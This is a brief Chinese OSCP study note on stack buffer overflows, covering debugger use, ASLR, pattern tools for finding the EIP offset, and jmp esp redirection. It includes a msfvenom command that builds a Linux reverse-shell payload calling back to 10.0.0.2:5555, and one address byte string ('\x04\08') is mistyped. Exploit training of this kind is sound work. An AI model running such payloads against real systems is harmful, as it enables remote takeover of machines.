缓存区溢出
缓存区溢出
oscp只考stack溢出




GDB调试
Explain输入500个A后,程序出现溢出,如果将EIP寄存器中存在的AAAA替换成Payload就可以实现执行任意的命令

在Explain处输入构造字符,可以确认
debugger图形化工具调试
地址空间配置随机加载:是指地址空间配置随机加载(英语:Address space layout randomization,缩写ASLR,又称地址空间配置随机化、地址空间布局随机化)是一种防范内存损坏漏洞被利用的计算机安全技术。
edb-debugger:动态调试工具
msf-pattern_create:字符序列生成工具
msf-pattern_offset:字符偏移计算
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.2 LPORT=5555 -b "\x00" -f py
如果程序本身具有jmp esp指令,只需将0x08049d55内存地址写入攻击脚本**BBBB**位置处
具体代码如下'\x55\x9d\x04\08'
关于数据值与内存地址
EIP: 0x45444342 ('BCDE') B对应的是42:EIP: 0x45444342 ('BCDE') C对应的是43:EIP: 0x45444342 ('BCDE') D对应的是44:EIP: 0x45444342 ('BCDE') E对应的是45:EIP: 0x45444342 ('BCDE')
最后更新于
这有帮助吗?